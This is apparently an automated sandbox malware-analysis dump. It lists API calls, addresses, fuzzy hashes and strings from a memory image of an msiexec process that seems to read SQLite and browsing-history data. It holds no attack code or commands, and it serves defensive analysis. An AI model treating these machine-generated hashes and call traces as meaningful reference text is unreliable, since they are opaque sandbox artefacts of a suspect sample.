                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AttributesFilefreememset
                                                                                                          • String ID:
                                                                                                          • API String ID: 2507021081-0
                                                                                                          • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                          • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                          • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                          • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                          APIs
                                                                                                          • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                          • malloc.MSVCRT ref: 00417524
                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                          • free.MSVCRT ref: 00417544
                                                                                                          • free.MSVCRT ref: 00417562
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 4131324427-0
                                                                                                          • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                          • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                          • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                          • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                          APIs
                                                                                                          • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                          • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                          • free.MSVCRT ref: 0041822B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PathTemp$free
                                                                                                          • String ID: %s\etilqs_$etilqs_
                                                                                                          • API String ID: 924794160-1420421710
                                                                                                          • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                          • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                          • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                          • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0040FDD5
                                                                                                            • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                          • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                          • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                          • API String ID: 1775345501-2769808009
                                                                                                          • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                          • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                          • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                          • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastMessage_snwprintf
                                                                                                          • String ID: Error$Error %d: %s
                                                                                                          • API String ID: 313946961-1552265934
                                                                                                          • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                          • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                          • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                          • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: foreign key constraint failed$new$oid$old
                                                                                                          • API String ID: 0-1953309616
                                                                                                          • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                          • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                          • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                          • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                          • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy
                                                                                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                          • API String ID: 3510742995-272990098
                                                                                                          • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                          • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                          • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                          • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                            • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                          • memset.MSVCRT ref: 0040C439
                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                          • _wcsupr.MSVCRT ref: 0040C481
                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                          • memset.MSVCRT ref: 0040C4D0
                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1265369119-0
                                                                                                          • Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                                          • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                          • Opcode Fuzzy Hash: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                                          • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0044A6EB
                                                                                                          • memset.MSVCRT ref: 0044A6FB
                                                                                                          • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpymemset
                                                                                                          • String ID: gj
                                                                                                          • API String ID: 1297977491-4203073231
                                                                                                          • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                          • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                          • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                          • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                          • free.MSVCRT ref: 0040E9D3
                                                                                                            • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??3@$free
                                                                                                          • String ID:
                                                                                                          • API String ID: 2241099983-0
                                                                                                          • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                          • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                          • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                          • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                          APIs
                                                                                                          • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                          • malloc.MSVCRT ref: 004174BD
                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                          • free.MSVCRT ref: 004174E4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 4053608372-0
                                                                                                          • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                          • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                          • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                          • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                          APIs
                                                                                                          • GetParent.USER32(?), ref: 0040D453
                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                          • String ID:
                                                                                                          • API String ID: 4247780290-0
                                                                                                          • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                          • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                          • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                          • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                          APIs
                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                          • memset.MSVCRT ref: 004450CD
                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1471605966-0
                                                                                                          • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                                          • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                          • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                                          • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                          APIs
                                                                                                          • wcscpy.MSVCRT ref: 0044475F
                                                                                                          • wcscat.MSVCRT ref: 0044476E
                                                                                                          • wcscat.MSVCRT ref: 0044477F
                                                                                                          • wcscat.MSVCRT ref: 0044478E
                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                          • String ID: \StringFileInfo\
                                                                                                          • API String ID: 102104167-2245444037
                                                                                                          • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                          • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                          • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                          • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                          APIs
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??3@
                                                                                                          • String ID:
                                                                                                          • API String ID: 613200358-0
                                                                                                          • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                          • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                          • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                          • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memicmpwcslen
                                                                                                          • String ID: @@@@$History
                                                                                                          • API String ID: 1872909662-685208920
                                                                                                          • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                          • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                          • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                          • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 004100FB
                                                                                                          • memset.MSVCRT ref: 00410112
                                                                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                          • _snwprintf.MSVCRT ref: 00410141
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                          • String ID: </%s>
                                                                                                          • API String ID: 3400436232-259020660
                                                                                                          • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                          • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                          • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                          • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0040D58D
                                                                                                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                          • String ID: caption
                                                                                                          • API String ID: 1523050162-4135340389
                                                                                                          • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                          • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                          • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                          • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                          APIs
                                                                                                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                          • String ID: MS Sans Serif
                                                                                                          • API String ID: 210187428-168460110
                                                                                                          • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                          • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                          • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                          • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassName_wcsicmpmemset
                                                                                                          • String ID: edit
                                                                                                          • API String ID: 2747424523-2167791130
                                                                                                          • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                          • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                          • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                          • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                          • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                          • String ID: SHAutoComplete$shlwapi.dll
                                                                                                          • API String ID: 3150196962-1506664499
